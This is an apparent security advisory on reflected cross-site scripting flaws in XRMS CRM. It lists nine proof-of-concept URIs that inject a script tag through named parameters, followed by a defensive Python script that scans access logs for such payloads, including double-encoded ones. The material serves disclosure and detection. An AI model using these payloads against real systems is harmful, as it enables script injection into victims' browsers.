XRMS CRM Multiple Input Validation Vulnerabilities

Attackers can exploit these issues via a browser. To exploit the cross-site scripting issues, an attacker must entice an unsuspecting user into following a malicious URI.

The following example URIs are available to demonstrate the cross-site scripting issues:

http://www.example.com/xrms/login.php?target="><script>alert(1);</script>
http://www.example.com/xrms/activities/some.php?title="><script>alert(1);</script>
http://www.example.com/xrms/companies/some.php?company_name="><script>alert(1);</script>
http://www.example.com/xrms/contacts/some.php?last_name="><script>alert(1);</script>
http://www.example.com/xrms/campaigns/some.php?campaign_title="><script>alert(1);</script>
http://www.example.com/xrms/opportunities/some.php?opportunity_title="><script>alert(1);</script>
http://www.example.com/xrms/cases/some.php?case_title="><script>alert(1);</script>
http://www.example.com/xrms/files/some.php?file_id="><script>alert(1);</script>
http://www.example.com/xrms/reports/custom/mileage.php?starting="><script>alert(1);</script>
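
The following is an added example, not part of the original advisory or of XRMS: a log-review script that flags requests in which one of the parameters listed above carries a quote or angle bracket, including double-encoded values. The combined access-log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Parameter names taken from the example URIs in the advisory.
ADVISORY_PARAMS = {
    "target", "title", "company_name", "last_name", "campaign_title",
    "opportunity_title", "case_title", "file_id", "starting",
}
# Characters that close an attribute value or open a tag.
MARKUP = re.compile(r'["<>]')
# Request field of a combined-format access log line (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2010:10:00:00 +0000] "GET /xrms/login.php?target=%22%3E%3Cscript%3Ealert(1);%3C/script%3E HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jan/2010:10:00:07 +0000] "GET /xrms/contacts/some.php?last_name=Smith HTTP/1.1" 200 2048',
    '203.0.113.9 - - [01/Jan/2010:10:01:30 +0000] "GET /xrms/cases/some.php?case_title=%2522%253E%253Cscript%253E HTTP/1.1" 200 733',
]


def suspicious_params(log_line):
    """Return sorted advisory parameter names whose decoded value contains markup."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    query = urlsplit(match.group(1)).query
    hits = set()
    for name, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl decodes once; decode again to catch double-encoded values.
        if name in ADVISORY_PARAMS and MARKUP.search(unquote_plus(value)):
            hits.add(name)
    return sorted(hits)


def scan(lines):
    """Return (line_number, parameter_names) for every flagged line."""
    results = []
    for number, line in enumerate(lines, start=1):
        hits = suspicious_params(line)
        if hits:
            results.append((number, hits))
    return results


if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        print(f"line {number}: markup in {', '.join(hits)}")
```

A hit means the request deserves review, not that script executed; legitimate values containing a quote will also be flagged.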


 

Copyright 2010, SecurityFocus